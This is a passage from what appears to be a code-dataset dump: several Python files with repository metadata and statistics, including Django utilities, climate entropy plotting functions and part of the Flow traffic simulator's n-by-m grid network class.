| 32.2 | 64 | 0.807453 | 24 | 161 | 4.916667 | 0.5 | 0.118644 | 0.237288 | 0.288136 | 0.423729 | 0.423729 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099379 | 161 | 4 | 65 | 40.25 | 0.813793 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ffe7475253c9d59caf8a228bf03f730c2b380f9e | 194 | py | Python | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | utils/views.py | windVane369/meiduo | 6165e2b1fe42aa529b6eb6ca832e9fa67b7477d3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.views import View
from django.contrib.auth.mixins import LoginRequiredMixin
class LoginRequiredView(LoginRequiredMixin, View):
"""验证用户登录的基类"""
pass
| 21.555556 | 57 | 0.737113 | 21 | 194 | 6.809524 | 0.761905 | 0.13986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006024 | 0.14433 | 194 | 8 | 58 | 24.25 | 0.855422 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
fff0888c5c0b2e98e143679f0fa601b45e6bb1b6 | 27 | py | Python | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | wp_sorter/wp_sorter/__init__.py | sobeckley/Wallpaper_Sorter | 8694fd98c1604c7f1e162e897863a6612f980ec0 | [
"MIT"
] | null | null | null | from .wp_sorter import app
| 13.5 | 26 | 0.814815 | 5 | 27 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b763746a3a21937c3730113ce8a6c286c62a9b1 | 205 | py | Python | example/categories/admin.py | LUKKIEN/django-cms-2.0 | 0600cc1a3f3636a867faf0afe3719539fee36d69 | [
"BSD-3-Clause"
] | 1 | 2016-05-09T09:33:41.000Z | 2016-05-09T09:33:41.000Z | example/categories/admin.py | alamierda09/django-cms-2.0 | 0aba7f465730ae9a975ea6fd0bf5cac1ba70022c | [
"BSD-3-Clause"
] | 1 | 2019-11-08T02:38:49.000Z | 2019-11-08T02:38:49.000Z | example/categories/admin.py | alamierda09/django-cms-2.0 | 0aba7f465730ae9a975ea6fd0bf5cac1ba70022c | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from categories.models import Category
from reversion.admin import VersionAdmin
class CategoryAdmin(VersionAdmin):
pass
admin.site.register(Category, CategoryAdmin)
| 20.5 | 44 | 0.829268 | 24 | 205 | 7.083333 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117073 | 205 | 9 | 45 | 22.777778 | 0.939227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.166667 | 0.5 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4b86b7331a42be828db61f050f2866d9f0333e03 | 29 | py | Python | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | ibtd/__init__.py | bwalshe/ibtd | 333f89c496927376db5ec3b1d5e47d9b39979f50 | [
"Apache-2.0"
] | null | null | null | from ibtd.graph import Graph
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4ba6297427c1c3bde9089c3b1fee9e7137b74915 | 37 | py | Python | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/test/mymodule.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | def print_name(name):
print(name) | 18.5 | 21 | 0.702703 | 6 | 37 | 4.166667 | 0.5 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 37 | 2 | 22 | 18.5 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
4bb5d99e905c95bf72a6a123895675fc3e302de5 | 48 | py | Python | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex111/utilidades/dado/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | from Aula22.ex111.utilidades import moeda, dado
| 24 | 47 | 0.833333 | 7 | 48 | 5.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 0.104167 | 48 | 1 | 48 | 48 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b09fdd57a8e24520dfb03285542bd371c64089 | 41 | py | Python | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 4 | 2021-07-23T16:34:24.000Z | 2022-03-01T18:31:59.000Z | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 1 | 2022-02-08T01:29:03.000Z | 2022-02-08T01:29:03.000Z | localization/__init__.py | jkennedyvz/DeepFaceLive | 274c20808da089eb7fc0fc0e8abe649379a29ffe | [
"MIT"
] | 1 | 2021-12-14T09:18:15.000Z | 2021-12-14T09:18:15.000Z | from .localization import Localization, L | 41 | 41 | 0.853659 | 5 | 41 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b332158283d8deb39d5af9b473c0cb8cc329d1 | 43 | py | Python | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | 1 | 2021-09-17T19:01:21.000Z | 2021-09-17T19:01:21.000Z | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | null | null | null | python-package/targeted/src/targeted/formula/__init__.py | kkholst/target | a63f3121efeae2c3441d7d2d2261fdf85038868e | [
"Apache-2.0"
] | null | null | null | from .riskreg import riskreg # noqa, F401
| 21.5 | 42 | 0.744186 | 6 | 43 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 0.186047 | 43 | 1 | 43 | 43 | 0.828571 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b0385024e7499c318170d4ec0f61b629b8eccad | 5,146 | py | Python | src/visualization/climate/global_it.py | jejjohnson/2019_rbig_rs | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | 2 | 2020-05-15T17:31:39.000Z | 2021-03-16T08:49:33.000Z | src/visualization/climate/global_it.py | jejjohnson/rbig_eo | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | null | null | null | src/visualization/climate/global_it.py | jejjohnson/rbig_eo | 00df5c623d55895e0b43a4130bb6c601fae84890 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from typing import Optional
plt.style.use(["seaborn-talk", "ggplot"])
SAVEPATH = (
"/home/emmanuel/projects/2020_rbig_rs/reports/figures/climate/amip/global/entropy/"
)
def plot_global_entropy(
results_df: pd.DataFrame,
base: str,
cmip: str,
normalized=True,
log_mi=True,
save=True,
) -> None:
if normalized == True:
results_df["h_cmip"] = results_df["h_cmip"] / results_df["spatial"] ** 2
results_df["h_base"] = results_df["h_base"] / results_df["spatial"] ** 2
# subset
results_df = results_df[results_df["base"] == base]
results_df = results_df[results_df["cmip"] == cmip]
fig, ax = plt.subplots()
sns.scatterplot(data=results_df, x="spatial", y="h_base", label=f"{base}", ax=ax)
sns.scatterplot(data=results_df, x="spatial", y="h_cmip", label=f"{cmip}", ax=ax)
ax.set_title(f"{base.upper()} vs CMIP: {cmip.upper()}")
ax.set_xlabel("Spatial Features")
# ax.set_xlim([2, 6])
ax.set_ylabel("Entropy, H")
ax.legend()
if save:
savename = f"global_h_{base}_{cmip}.png"
fig.savefig(SAVEPATH + savename)
else:
plt.show()
return None
def plot_global_diff_entropy(
results_df: pd.DataFrame,
base: str,
normalized: bool = True,
log_mi: bool = False,
save: bool = True,
) -> None:
# print(results_df.head())
results_copy = results_df[results_df["base"] == base]
# print(results_copy.head())
if normalized == True:
results_copy["h_base"] = results_copy["h_base"] / results_copy["spatial"] ** 2
results_copy["h_cmip"] = results_copy["h_cmip"] / results_copy["spatial"] ** 2
# print(results_copy.head())
# calculate difference
results_copy["h_diff"] = np.abs(results_copy["h_cmip"] - results_copy["h_base"])
# print(results_copy.head())
if log_mi == True:
results_copy["h_diff"] = np.log(results_copy["h_diff"])
fig, ax = plt.subplots()
# sns.scatterplot(ax=ax, data=results_copy, x='spatial', y='h_diff', hue='base', color='black')
# print(results_copy.head())
sns.lineplot(
ax=ax,
data=results_copy,
x="spatial",
y="h_diff",
hue="cmip",
linewidth=6,
marker="o",
)
plt.title(f"")
plt.xlabel("Spatial Features", fontsize=20)
plt.ylabel("Difference in Entropy", fontsize=20)
plt.legend(ncol=2, bbox_to_anchor=(2.05, 1), fontsize=16)
if save:
savename = f"global_dh_{base}.png"
fig.savefig(SAVEPATH + savename)
else:
plt.show()
return None
def plot_global_mutual_info(
results_df: pd.DataFrame,
base: str,
measure: str,
cmip: Optional[str] = None,
normalized=True,
log_mi=True,
save=True,
) -> None:
# subset
results_df = results_df[results_df["base"] == base]
if cmip is not None:
results_df = results_df[results_df["cmip"] == cmip]
if normalized and measure == "mi":
# print("norm")
results_df[measure] = results_df[measure] / results_df["spatial"] ** 2
# print(results_df.head())
if log_mi == True:
results_df[measure] = np.log10(1 + results_df[measure])
fig, ax = plt.subplots()
sns.lineplot(data=results_df, x="spatial", y=measure, hue="cmip", ax=ax)
# ax.set_title(f"{base.upper()} vs CMIP: {cmip.upper()}")
ax.set_xlabel("Spatial Features")
# ax.set_xlim([2, 6])
ax.set_ylabel("Mutual Information")
ax.legend()
if save:
savename = f"global_mi_{base}_{cmip}.png"
fig.savefig(SAVEPATH + savename)
else:
plt.show()
return None
def plot_global_diff_mutual_info(
results_df: pd.DataFrame,
base: str,
normalized: bool = True,
log_mi: bool = False,
save: bool = True,
) -> None:
# print(results_df.head())
results_copy = results_df[results_df["base"] == base]
# print(results_copy.head())
if normalized == True:
results_copy["h_base"] = results_copy["h_base"] / results_copy["spatial"] ** 2
results_copy["h_cmip"] = results_copy["h_cmip"] / results_copy["spatial"] ** 2
# print(results_copy.head())
# calculate difference
results_copy["h_diff"] = np.abs(results_copy["h_cmip"] - results_copy["h_base"])
# print(results_copy.head())
if log_mi == True:
results_copy["h_diff"] = np.log(results_copy["h_diff"])
fig, ax = plt.subplots()
# sns.scatterplot(ax=ax, data=results_copy, x='spatial', y='h_diff', hue='base', color='black')
# print(results_copy.head())
sns.lineplot(
ax=ax,
data=results_copy,
x="spatial",
y="h_diff",
hue="cmip",
linewidth=6,
marker="o",
)
plt.title(f"")
plt.xlabel("Spatial Features", fontsize=20)
plt.ylabel("Difference in Entropy", fontsize=20)
plt.legend(ncol=2, bbox_to_anchor=(2.05, 1), fontsize=16)
if save:
savename = f"global_dh_{base}.png"
fig.savefig(SAVEPATH + savename)
else:
plt.show()
return None
| 29.073446 | 103 | 0.616984 | 707 | 5,146 | 4.287129 | 0.157001 | 0.109865 | 0.071264 | 0.059386 | 0.847575 | 0.82778 | 0.78357 | 0.750907 | 0.689211 | 0.637743 | 0 | 0.010545 | 0.226001 | 5,146 | 176 | 104 | 29.238636 | 0.750439 | 0.128255 | 0 | 0.753846 | 0 | 0.007692 | 0.146953 | 0.030018 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.038462 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9a44ddda9d9bff29c980ddb97a74036b4cb1502 | 28 | py | Python | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | json_structure/__init__.py | fatalispm/json_structure | 216d844bff3be075ce9cd35d281ebc7b4fd63a4a | [
"MIT"
] | null | null | null | from .main import structure
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9f4d85d2635e0bceec6f5ce2862415e9eab3d76 | 81 | py | Python | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | 1 | 2021-02-08T22:20:34.000Z | 2021-02-08T22:20:34.000Z | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | null | null | null | colliflow/python/colliflow/modules/__init__.py | YodaEmbedding/colliflow | 524a9397878ce2e7dde6a4526a91f866c03fc3e7 | [
"MIT"
] | null | null | null | from .input import *
from .module import *
# from .tcp_server_subgraph import *
| 16.2 | 36 | 0.740741 | 11 | 81 | 5.272727 | 0.636364 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17284 | 81 | 4 | 37 | 20.25 | 0.865672 | 0.419753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a7d15fee43c2ee5916d2f9de0261c58d03a1edb | 65,515 | py | Python | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-03-05T07:39:51.000Z | 2021-03-05T07:39:51.000Z | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-09-13T02:16:02.000Z | 2021-09-13T02:16:02.000Z | flow/networks/grid_nxm.py | mepear/flow | 4fc6ceaf64ca522b5a5c4104a3098b20cf207dd4 | [
"MIT"
] | 1 | 2021-08-21T13:58:30.000Z | 2021-08-21T13:58:30.000Z | """Contains the traffic light grid scenario class."""
from flow.networks.base import Network
from flow.core.params import InitialConfig
from flow.core.params import TrafficLightParams, PersonParams
from collections import defaultdict
import numpy as np
ADDITIONAL_NET_PARAMS = {
# dictionary of traffic light grid array data
"grid_array": {
# number of horizontal rows of edges
"row_num": 3,
# number of vertical columns of edges
"col_num": 3,
# length of inner edges in the traffic light grid network
"inner_length": None,
# length of outer edges in the traffic light grid network
"outer_length": None,
# split a edge to several sub-edges, the number of sub-edges
"sub_edge_num": 1,
},
# number of lanes in the horizontal edges
"horizontal_lanes": 1,
# number of lanes in the vertical edges
"vertical_lanes": 1,
# speed limit for all edges, may be represented as a float value, or a
# dictionary with separate values for vertical and horizontal lanes
"speed_limit": {
"horizontal": 35,
"vertical": 35
}
}
class GridnxmNetwork(Network):
"""Traffic Light Grid network class.
The traffic light grid network consists of m vertical lanes and n
horizontal lanes, with a total of nxm intersections where the vertical
and horizontal edges meet.
Requires from net_params:
* **grid_array** : dictionary of grid array data, with the following keys
* **row_num** : number of horizontal rows of edges
* **col_num** : number of vertical columns of edges
* **inner_length** : length of inner edges in traffic light grid network
* **horizontal_lanes** : number of lanes in the horizontal edges
* **vertical_lanes** : number of lanes in the vertical edges
* **speed_limit** : speed limit for all edges. This may be represented as a
float value, or a dictionary with separate values for vertical and
horizontal lanes.
Usage
-----
>>> from flow.core.params import NetParams
>>> from flow.core.params import VehicleParams
>>> from flow.core.params import InitialConfig
>>> from flow.networks import TrafficLightGridNetwork
>>>
>>> network = TrafficLightGridNetwork(
>>> name='grid',
>>> vehicles=VehicleParams(),
>>> net_params=NetParams(
>>> additional_params={
>>> 'grid_array': {
>>> 'row_num': 3,
>>> 'col_num': 2,
>>> 'inner_length': 500,
>>> 'sub_edge_num': 1,
>>> },
>>> 'horizontal_lanes': 1,
>>> 'vertical_lanes': 1,
>>> 'speed_limit': {
>>> 'vertical': 35,
>>> 'horizontal': 35
>>> }
>>> },
>>> )
>>> )
"""
def __init__(self,
name,
vehicles,
net_params,
persons=PersonParams(),
initial_config=InitialConfig(),
traffic_lights=TrafficLightParams()):
"""Initialize an n*m traffic light grid network."""
optional = ["tl_logic", "outer_length"]
for p in ADDITIONAL_NET_PARAMS.keys():
if p not in net_params.additional_params and p not in optional:
raise KeyError('Network parameter "{}" not supplied'.format(p))
for p in ADDITIONAL_NET_PARAMS["grid_array"].keys():
if p not in net_params.additional_params["grid_array"] and p not in optional:
raise KeyError(
'Grid array parameter "{}" not supplied'.format(p))
# retrieve all additional parameters
# refer to the ADDITIONAL_NET_PARAMS dict for more documentation
self.vertical_lanes = net_params.additional_params["vertical_lanes"]
self.horizontal_lanes = net_params.additional_params[
"horizontal_lanes"]
self.speed_limit = net_params.additional_params["speed_limit"]
if not isinstance(self.speed_limit, dict):
self.speed_limit = {
"horizontal": self.speed_limit,
"vertical": self.speed_limit
}
self.grid_array = net_params.additional_params["grid_array"]
self.row_num = self.grid_array["row_num"]
self.col_num = self.grid_array["col_num"]
self.inner_length = self.grid_array["inner_length"]
self.outer_length = self.grid_array.get("outer_length", None)
self.sub_edge_num = self.grid_array.get("sub_edge_num", 1)
# specifies whether or not there will be traffic lights at the
# intersections (False by default)
self.use_traffic_lights = net_params.additional_params.get(
"traffic_lights", False)
# radius of the inner nodes (ie of the intersections)
# self.inner_nodes_radius = 2.9 + 3.3 * max(self.vertical_lanes,
# self.horizontal_lanes)
self.inner_nodes_radius = 0
# total number of edges in the network
self.num_edges = 4 * ((self.col_num + 1) * self.row_num + self.col_num)
# name of the network (DO NOT CHANGE)
self.name = "BobLoblawsLawBlog"
super().__init__(name, vehicles, net_params, persons, initial_config,
traffic_lights)
def specify_nodes(self, net_params):
"""Build out the inner nodes of the network.
The inner nodes correspond to the intersections between the roads. They
are numbered from bottom left, increasing first across the columns and
then across the rows.
For example, the nodes in a traffic light grid with 2 rows and 3 columns
would be indexed as follows:
| | |
--- 3 --- 4 --- 5 ---
| | |
--- 0 --- 1 --- 2 ---
| | |
The id of a node is then "center{index}", for instance "center0" for
node 0, "center1" for node 1 etc.
Returns
-------
list <dict>
List of inner nodes
"""
node_type = "traffic_light" if self.use_traffic_lights else "priority"
nodes = []
inserted_nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
nodes.append({
"id": "center{}".format(row * self.col_num + col),
"x": col * self.inner_length,
"y": row * self.inner_length,
"type": node_type,
# "radius": self.inner_nodes_radius
})
inserted_nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
for n in range(self.sub_edge_num - 1):
cur_id = row * self.col_num + col
if col < self.col_num - 1:
inserted_nodes.append({
"id": "{}-{}_{}".format(cur_id, cur_id + 1, n),
"x": col * self.inner_length + self.inner_length * (n + 1) / self.sub_edge_num,
"y": row * self.inner_length,
"type": "priority"
})
if row < self.row_num - 1:
inserted_nodes.append({
"id": "{}-{}_{}".format(cur_id, cur_id + self.col_num, n),
"x": col * self.inner_length,
"y": row * self.inner_length + self.inner_length * (n + 1) / self.sub_edge_num,
"type": "priority"
})
return nodes + inserted_nodes
def specify_edges(self, net_params):
"""Build out the inner edges of the network.
The inner edges are the edges joining the inner nodes to each other.
Consider the following network with n = 2 rows and m = 3 columns,
where the rows are indexed from 0 to 1 and the columns from 0 to 2, and
the inner nodes are marked by 'x':
| | |
(1) ----x-----x-----x----
| | |
(0) ----x-----x-(*)-x----
| | |
(0) (1) (2)
There are n * (m - 1) = 4 horizontal inner edges and (n - 1) * m = 3
vertical inner edges, all that multiplied by two because each edge
consists of two roads going in opposite directions traffic-wise.
On an horizontal edge, the id of the top road is "top{i}_{j}" and the
id of the bottom road is "bot{i}_{j}", where i is the index of the row
where the edge is and j is the index of the column to the right of it.
On a vertical edge, the id of the right road is "right{i}_{j}" and the
id of the left road is "left{i}_{j}", where i is the index of the row
above the edge and j is the index of the column where the edge is.
For example, on edge (*) on row (0): the id of the bottom road (traffic
going from left to right) is "bot0_2" and the id of the top road
(traffic going from right to left) is "top0_2".
Returns
-------
list <dict>
List of inner edges
"""
edges = []
def new_edge(index, from_node, to_node, orientation, lane):
assert from_node != to_node
if from_node < to_node:
node_list = ["center{}".format(from_node)] + ["{}-{}_{}".format(from_node, to_node, n) for n in range(self.sub_edge_num - 1)] + ["center{}".format(to_node)]
else:
node_list = ["center{}".format(from_node)] + ["{}-{}_{}".format(to_node, from_node, n) for n in range(self.sub_edge_num - 2, -1, -1)] + ["center{}".format(to_node)]
new_edges = []
for i, node in enumerate(node_list):
if i + 1 < len(node_list):
new_edges.append({
"id": "{}{}_{}".format(lane, index, i),
"type": orientation,
"priority": 78, # Why 78?
"from": node,
"to": node_list[i + 1],
"length": self.inner_length / self.sub_edge_num
})
return new_edges
# Build the horizontal inner edges
for i in range(self.row_num):
for j in range(self.col_num - 1):
node_index = i * self.col_num + j
index = "{}_{}".format(i, j + 1)
edges += new_edge(index, node_index + 1, node_index,
"horizontal", "top")
edges += new_edge(index, node_index, node_index + 1,
"horizontal", "bot")
# Build the vertical inner edges
for i in range(self.row_num - 1):
for j in range(self.col_num):
node_index = i * self.col_num + j
index = "{}_{}".format(i + 1, j)
edges += new_edge(index, node_index, node_index + self.col_num,
"vertical", "right")
edges += new_edge(index, node_index + self.col_num, node_index,
"vertical", "left")
return edges
def specify_routes(self, net_params):
"""See parent class."""
routes = {}
# conn = self.specify_connections(net_params)
# for node_id in range(self.row_num * self.col_num):
# node_conn = conn['center{}'.format(node_id)]
# for c in node_conn:
# from_edge = c['from']
# target_edge = c['to']
# if from_edge not in routes:
# routes[from_edge] = []
# routes[from_edge].append([[from_edge, target_edge], 1])
# for r in routes:
# l = len(routes[r])
# for i, route in enumerate(routes[r]):
# route[1] = 1. / l
# routes[r][i] = tuple(route)
edges = self.specify_edges(net_params)
for edge in edges:
routes[edge['id']] = [edge['id']]
return routes
def specify_types(self, net_params):
"""See parent class."""
types = [{
"id": "horizontal",
"numLanes": self.horizontal_lanes,
"speed": self.speed_limit["horizontal"]
}, {
"id": "vertical",
"numLanes": self.vertical_lanes,
"speed": self.speed_limit["vertical"]
}]
return types
# ===============================
# ============ UTILS ============
# ===============================
def specify_connections(self, net_params):
"""Build out connections at each inner node.
"""
con_dict = {}
# specify certain connections for given edge pair
# In form of {"from" : edge id,
# "to" : edge id, \
# "fromLane":(sub-edge of a certain edge and it is by default 0) : {number between 0 to self.lanes - 1},
# "toLane":{number between 0 to self.lanes - 1}}
def new_con(side, from_id, to_id, signal_group, toside=None, from_sub_id=0, to_sub_id=0, inv=False):
if toside is None:
toside = side
conn = []
lane1s = range(self.vertical_lanes) if not inv else [self.vertical_lanes - 1]
for lane1 in lane1s:
for lane2 in range(self.vertical_lanes):
conn.append({
"from": side + from_id + "_{}".format(from_sub_id),
"to": toside + to_id + "_{}".format(to_sub_id),
"fromLane": str(lane1),
"toLane": str(lane2),
})
# conn = [{
# "from": side + from_id + "_{}".format(from_sub_id),
# "to": toside + to_id + "_{}".format(to_sub_id)
# # "fromLane": str(lane),
# # "toLane": str(lane),
# # "signal_group": signal_group
# }]
